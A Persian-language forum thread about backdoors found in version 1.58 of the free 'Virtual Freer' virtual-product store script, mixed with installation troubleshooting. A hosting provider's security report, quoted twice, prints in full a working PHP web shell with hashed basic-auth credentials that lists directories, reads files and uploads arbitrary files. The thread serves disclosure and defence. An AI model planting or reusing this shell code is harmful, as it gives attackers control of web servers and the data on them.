پاسخ : اسکریپت رایگان فروش کارتهای شارژ و محصولات مجازی Virtual Freer
نقل قول:
نوشته اصلی توسط
kyko
بعضی از مشتری ها بعد از پرداخت با خطای (سفارش قبلا پرداخت شده است) مواجه میشند
دلیلش چی هست
سلام
دوست عزیز ابتدا از فایل های درون پوشه public html یه بک آپ بگیرید
سپس از روی database بک آپ بگیرید
حال ابتدا فایل upgerade.sql مربوط به آپگرید به ورژن 1.58 رو طبق آموزش سایت Freer درون database ایمپورت کنید
نهایتا کل محتویات پوشه public html رو پاک کنید و نسخه نصبی 1.58 رو به پوشه public html انتقال داده و با همان اطلاعات دیتابیس قبلی نصب کنید
ورژن 1.58 که نصب شد یکبار دیگه فایل های مربوط به درگاه رو به پوشه پلاگین رو انتقال بدید و اطلاعات درگاه رو درون تنظیمات مدیریت وارد کنید
مشکل به صورت ریشه ای حل می شود
حتما موارد امنیتی توصیه شده در این سایت رو هم بعد از اوکی شدن ورژن 1.58 انجام بدید تا خیالتون راحت باشه
http://www.softiran.org/view-item/97...safe-pack.html
شخصا کلی تست انجام دادم تا مشکل به همین صورت که عرض کردم حل شد
پاسخ : اسکریپت رایگان فروش کارتهای شارژ و محصولات مجازی Virtual Freer
سلام من فایل فریر اپلود کردم این خطا رو موقع نصب میده؟!!!
Parse error: syntax error, unexpected '$config' (T_VARIABLE), expecting identifier (T_STRING) in /var/www/vhosts/mydomain.ir/httpdocs/freer/install/index.php on line 258
- - - Updated - - -
سلام دوستان
من وقتی میخوام فریر رو نصب کم با ین خطا مواجه میشم علت چیه؟
ممنون میشم راهنمایی بفرمایید.
Parse error: syntax error, unexpected '$config' (T_VARIABLE), expecting identifier (T_STRING) in /var/www/vhosts/mydomain.ir/httpdocs/freer/install/index.php on line 258
پاسخ : اسکریپت رایگان فروش کارتهای شارژ و محصولات مجازی Virtual Freer
سلام
کدی که اشاره کردید رو منم تو سایت خودم مشاهده کردم. البته تو فایل اپلودی در سور فریر امروز اصلاح شده!!!
فریر نه از طرف نویسنده و نه از جانب نفوز هکر ها قابل اطمینان نیست.
پاسخ : اخطار امنیتی - گزارش باگ
نقل قول:
نوشته اصلی توسط
Alirezayb
سلام خدمت اساتید
من ورژن 1.58 که آخرین ورژن هست رو از سایت دانلود کردم , اما موقع انتقال با ارور تروجان مواجه شدم و وقتی که مدیر سایت گفتم این مطلب رو برام فرستاد که من این متن رو برای طراح اسکریت ایمیل کردم و گفتم :
کد PHP:
سلام
خسته نباشید
من اومدم اسکریپت رو به هاستم انتقال بدم که دیدم ارور تروجان میگیره
با مدیریت هاست در تماس بودم که این مطلب رو در مورد بکدور و... برام ارسال کرد که عینا براتون ارسال میکنم.
فایل هم ضمیمه شد
فکر کردم قبل از پرسیدن و مطرح کردن تو وب هاستینگ تاک با شما صحبت کنم
منتظر حل مشکل هستم
با سلام خدمت شما
طی بررسی فایل آرشیو ارسالی کدهای بکدور در ۳ فایل زیر در این آرشیو شناسایی شد:
virtual_freer_v1.58/include/libs/smarty/sysplugins/smarty_internal_templateparser.php
virtual_freer_v1.58/include/libs/smarty/sysplugins/smarty_internal_configfileparser.php
virtual_freer_v1.58/include/libs/nusoap.php
جزییات دقیق کدهای شناسایی شده در فایل پیوست تیکت قابل مشاهده می باشد.
این کدها امکان اجرای کدهای ریموت و یا آپلود شل را بر روی سایت میزبان فراهم می کنند. در صورتیکه این فایل را از سایت مرجع و اصلی طراح اسکریپت دریافت ننموده اید پیشنهاد می شود از استفاده از این آرشیو نصب بر روی سرویس خود پرهیز نمایید و به جای آن فایل آرشیو را از سایت اصلی دریافت نمایید.
چنانچه فایل را از سایت اصلی دریافت نموده اید، خواهشمند است حتما موضوع را به طراح اسکریپت/مدیر سایت مورد نظر اطلاع داده و از ایشان بخواهید حتما این مشکل را پیگیری و چگونگی اینجکت کدها بکدور به آرشیو نصب ارایه شده را پیگیری و بررسی های امنیتی دقیق در این مورد را پیگیری کنند. همچنین حتما کد اسکریپت را به صورت کامل بررسی و از عدم وجود کدهای بکدور دیگر در آرشیو ارایه شده اطمینان حاصل نموده و پس از پاکسازی کامل و رفع مشکل امنیتی آرشیو نصب جدید را در اختیار شما قرار دهند.( فایل آرشیو تیکت حاوی کدهای مخرب شناسایی شده است شما متیوانید این فایل را جهت پیگیری در اختیار طراح/مدیر سایتی که آرشیو را از آن سایت دریافت نموده اید قرار دهید)
و این فایل رو dmz هم برام فرستاد که بدم (آپلود کردم)
طراح هم در جواب بهم گفتن که برم از سایت و دوباره دانلود کنم
و باز به مدیر هاست گفتم و ایشون باز یه ارور دیگه گرفتن و من باز برای طراح اسکریپت فرستادم که اصلاح کنن , اما 3 روزه که خبری نشده
کد PHP:
سلام مجدد
این رو هم بخونید لطفا
با سلام خدمت شما
در فایل آرشیو جدید ارسالی کدهای مخرب شناسایی شده حذف شده اند. اما یک مورد کد بکدور دیگر که قبلا شناسایی نشده بود در فایل
virtual_freer_v1.58/include/libs/smarty/plugins/function.engine.php
مشاهده شد. این کد نیز یک کد بکدور برای آپلود فایل دلخواه می باشد.
کد شناسایی شده به شرح زیر است:
============
$user='16d1a558492edec3ed7775be2942c1cd';
$pass='16d1a558492edec3ed7775be2942c1cd';
if ($_SERVER["PHP_AUTH_USER"] == "" || $_SERVER["PHP_AUTH_PW"] == "" || md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"]) !=$pass) {
header("HTTP/1.0 401 Unauthorized");
header("WWW-Authenticate: Basic realm=\"eshghi");
echo "<h1>Authorization Required.</h1>";
die();
}else{
error_reporting(0);
set_magic_quotes_runtime(0);
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\\";
}else{$s="/";
}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();
}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
';}else{$lf=$lf.$f.'
';}}closedir($hr);
}$form='<form action="'.$_SERVER['PHP_SELF'].'" method=post>';
echo '<center><textarea cols=90 rows=20>';
if($_GET['cme']){opendir($_GET['cme']);
}else{echo $df.$lf;};
echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'>
<input type=submit value=Go></form>'.$form.'Read File : <input name=cme size=50 value=id>
<input type=submit value=Read!></form>
<form action="'.$me.'" method=post enctype=multipart/form-data>
Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'>
<input type=submit value=Send></form><br>';
if(isset ($_POST['cme'])){
$myFile = $_POST['cme'];
$fh = fopen($myFile, 'r');
if($theData = fread($fh, filesize($myFile))){
fclose($fh);
echo '<textarea clos=90 rows=20>'.$theData.'</textarea>';
}
else{
echo "File Could Not Found!!";
}}}
?>
============
با توجه به این اطلاعات ظاهرا کد آرشیو به صورت کامل توسط طراح اسکریپت بررسی و پاکسازی نشده است. اطمینان کامل از عدم وجود کدهای مخرب تنها با بررسی دقیق کدهای تمامی اسکریپتها امکانپذیر می باشد در غیر اینصورت تضمینی برای شناسایی تمامی کدهای مخرب وجود ندارد(کما اینکه در بررسی اولیه انجام شده کد مورد اشاره در بالا شناسایی نشده بود). با توجه به این موضوع پیشنهاد می شود تا بررسی کامل فایلهای آرشیو نصب اسکریپت که ممکن است چند روز به زمان نیاز داشته باشد از نصب این اسکریپت بر روی سرویس خود پرهیز نمایید. البته در صورت نگهداری آرشیو های جداگانه از فایلها و نگهداری هش تمامی فایلهای بسته در یک محل امن و یا استفاده از ابزازهای مدیریت سوروس برنامه هایی مانند
git
برای مدیریت و نگهداری سورس برنامه توسط طراح اسکریپت، به راحتی امکان شناسایی چنین نفوذها و دستکاری هایی و اصلاح سریع آنها توسط طراح وجود خواهد داشت.
این رو هم فرستادم اما خبری نشد
از دوستان کسی هست که بتونه این مشکل رو برطرف بکنه ؟
1- فریر را از کجا دانلود کردید ؟ از سایت اصلی فریر freer.ir یا سایت های اسکریپت رایگان ؟
2- اگر شما از این پکیچ استفاده کنید :
http://www.softiran.org/view-item/97...safe-pack.html
دسترسی اجرا شل در تمامی این فولدر ها قطع میشود و اگر شل هم روی هاست شما باشد کسی نمیتواند از آن استفاده کند.
3- اسمارتی یک کتابخانه است ، شما میتواند کل فولدر اسمارتی را از روی هاست حذف کنید و آخرین ورژن را از این سایت دانلود :
http://www.smarty.net/download
کنید و از آن استفاده کنید .
فقط حتما بعد از به روز رسانی اسمارتی محتوایات فولدر templates_c را حذف کنید .
پاسخ : اخطار امنیتی - گزارش باگ
نقل قول:
نوشته اصلی توسط
us12
1- فریر را از کجا دانلود کردید ؟ از سایت اصلی فریر freer.ir یا سایت های اسکریپت رایگان ؟
2- اگر شما از این پکیچ استفاده کنید :
http://www.softiran.org/view-item/97...safe-pack.html
دسترسی اجرا شل در تمامی این فولدر ها قطع میشود و اگر شل هم روی هاست شما باشد کسی نمیتواند از آن استفاده کند.
3- اسمارتی یک کتابخانه است ، شما میتواند کل فولدر اسمارتی را از روی هاست حذف کنید و آخرین ورژن را از این سایت دانلود :
http://www.smarty.net/download
کنید و از آن استفاده کنید .
فقط حتما بعد از به روز رسانی اسمارتی محتوایات فولدر templates_c را حذف کنید .
بنده فریر ور از سایت freer.ir دانلود کردم . ورژن 1.58 مربوط به چند روز پیش
امروز که مجدد دانلود کردم فایلهایی که اشاره کرده بودند اصلاح شده بودند .
تشکر بابت راهنمایی
پاسخ : اخطار امنیتی - گزارش باگ
نقل قول:
نوشته اصلی توسط
doctorportable
بنده فریر ور از سایت freer.ir دانلود کردم . ورژن 1.58 مربوط به چند روز پیش
امروز که مجدد دانلود کردم فایلهایی که اشاره کرده بودند اصلاح شده بودند .
تشکر بابت راهنمایی
البته فریر که الان برای دانلود قرار داده باز هم شل هایی در فایل install.php دارد !!
به زودی همان نسخه قبلی 1.57 با امنیت تضمین شده را لینک میدهم تا کاربران دانلود کنند .
-----------
ورژن 1.57 با آخرین تمهیدات امنیتی :
http://www.softiran.org/article/57/v...sion-1.57.html
پاسخ : اخطار امنیتی - گزارش باگ
نقل قول:
نوشته اصلی توسط
us12
البته فریر که الان برای دانلود قرار داده باز هم شل هایی در فایل install.php دارد !!
به زودی همان نسخه قبلی 1.57 با امنیت تضمین شده را لینک میدهم تا کاربران دانلود کنند .
-----------
ورژن 1.57 با آخرین تمهیدات امنیتی :
http://www.softiran.org/article/57/v...sion-1.57.html
ورژن 1.57 مشکلاتی داره و مهمترینش عدم تحویل بعد از پرداخت بود
شما که وارد هستید مشکلات ورژن 1.58 را شناسایی و به سازنده اسکریپت اطلاع بدید :53:
پاسخ : اخطار امنیتی - گزارش باگ
نقل قول:
نوشته اصلی توسط
kyko
ورژن 1.57 مشکلاتی داره و مهمترینش عدم تحویل بعد از پرداخت بود
شما که وارد هستید مشکلات ورژن 1.58 را شناسایی و به سازنده اسکریپت اطلاع بدید :53:
من اطلاع دادم ولی معلوم نیست چرا هر فایلی که آپلود می کند یک شل داره !
بازم به نظر من برای کارهای عادی ورژن 1.57 بهتر از 1.58 است و هر کس با ورژن قبلی مشکل دارد باید موردی بررسی شود تا علت اصلی ( که به احتمال زیاد به هاست و ورژن php مربوط میشود ) پیدا شود .
اگر هم وقت داشته باشم ورژن 1.58 را ایمن شده لینک قرار میدهم ...
ناگفته نماید لینکی که گذاشتم با PHP ورژن 5.4 مشکلی ندارد و می توانید ورژن پی اچ پی را بالا ببرید .
پاسخ : اخطار امنیتی - گزارش باگ
نقل قول:
نوشته اصلی توسط
us12
1- فریر را از کجا دانلود کردید ؟ از سایت اصلی فریر freer.ir یا سایت های اسکریپت رایگان ؟
2- اگر شما از این پکیچ استفاده کنید :
http://www.softiran.org/view-item/97...safe-pack.html
دسترسی اجرا شل در تمامی این فولدر ها قطع میشود و اگر شل هم روی هاست شما باشد کسی نمیتواند از آن استفاده کند.
3- اسمارتی یک کتابخانه است ، شما میتواند کل فولدر اسمارتی را از روی هاست حذف کنید و آخرین ورژن را از این سایت دانلود :
http://www.smarty.net/download
کنید و از آن استفاده کنید .
فقط حتما بعد از به روز رسانی اسمارتی محتوایات فولدر templates_c را حذف کنید .
از خود سایت اصلی دانلود کرده بودم
- - - Updated - - -
نقل قول:
نوشته اصلی توسط
Alirezayb
طراح هم در جواب بهم گفتن که برم از سایت و دوباره دانلود کنم
و باز به مدیر هاست گفتم و ایشون باز یه ارور دیگه گرفتن و من باز برای طراح اسکریپت فرستادم که اصلاح کنن , اما 3 روزه که خبری نشده
کد PHP:
سلام مجدد
این رو هم بخونید لطفا
با سلام خدمت شما
در فایل آرشیو جدید ارسالی کدهای مخرب شناسایی شده حذف شده اند. اما یک مورد کد بکدور دیگر که قبلا شناسایی نشده بود در فایل
virtual_freer_v1.58/include/libs/smarty/plugins/function.engine.php
مشاهده شد. این کد نیز یک کد بکدور برای آپلود فایل دلخواه می باشد.
کد شناسایی شده به شرح زیر است:
============
$user='16d1a558492edec3ed7775be2942c1cd';
$pass='16d1a558492edec3ed7775be2942c1cd';
if ($_SERVER["PHP_AUTH_USER"] == "" || $_SERVER["PHP_AUTH_PW"] == "" || md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"]) !=$pass) {
header("HTTP/1.0 401 Unauthorized");
header("WWW-Authenticate: Basic realm=\"eshghi");
echo "<h1>Authorization Required.</h1>";
die();
}else{
error_reporting(0);
set_magic_quotes_runtime(0);
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\\";
}else{$s="/";
}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();
}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
';}else{$lf=$lf.$f.'
';}}closedir($hr);
}$form='<form action="'.$_SERVER['PHP_SELF'].'" method=post>';
echo '<center><textarea cols=90 rows=20>';
if($_GET['cme']){opendir($_GET['cme']);
}else{echo $df.$lf;};
echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'>
<input type=submit value=Go></form>'.$form.'Read File : <input name=cme size=50 value=id>
<input type=submit value=Read!></form>
<form action="'.$me.'" method=post enctype=multipart/form-data>
Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'>
<input type=submit value=Send></form><br>';
if(isset ($_POST['cme'])){
$myFile = $_POST['cme'];
$fh = fopen($myFile, 'r');
if($theData = fread($fh, filesize($myFile))){
fclose($fh);
echo '<textarea clos=90 rows=20>'.$theData.'</textarea>';
}
else{
echo "File Could Not Found!!";
}}}
?>
============
با توجه به این اطلاعات ظاهرا کد آرشیو به صورت کامل توسط طراح اسکریپت بررسی و پاکسازی نشده است. اطمینان کامل از عدم وجود کدهای مخرب تنها با بررسی دقیق کدهای تمامی اسکریپتها امکانپذیر می باشد در غیر اینصورت تضمینی برای شناسایی تمامی کدهای مخرب وجود ندارد(کما اینکه در بررسی اولیه انجام شده کد مورد اشاره در بالا شناسایی نشده بود). با توجه به این موضوع پیشنهاد می شود تا بررسی کامل فایلهای آرشیو نصب اسکریپت که ممکن است چند روز به زمان نیاز داشته باشد از نصب این اسکریپت بر روی سرویس خود پرهیز نمایید. البته در صورت نگهداری آرشیو های جداگانه از فایلها و نگهداری هش تمامی فایلهای بسته در یک محل امن و یا استفاده از ابزازهای مدیریت سوروس برنامه هایی مانند
git
برای مدیریت و نگهداری سورس برنامه توسط طراح اسکریپت، به راحتی امکان شناسایی چنین نفوذها و دستکاری هایی و اصلاح سریع آنها توسط طراح وجود خواهد داشت.
این رو هم فرستادم اما خبری نشد
از دوستان کسی هست که بتونه این مشکل رو برطرف بکنه ؟
در مورد بخش دوم که جواب نداده بودن هم ایشون جواب ایمیل من و ریپورت باگ رو اینچنینی دادن :
سلام
فایل گزارش شده را کامل پاک کنید.
//
در حال برنامه ریزی برای نسخه دوم فریر هستیم و پشتیبانی و رفع مشکلات نسخه جاری را به حداقل رساندیم و فقط مشکلاتی که گزارش میشود را رفع می کنیم. اگر فایل مشکل دار دیگری یافتید اطلاع دهید.
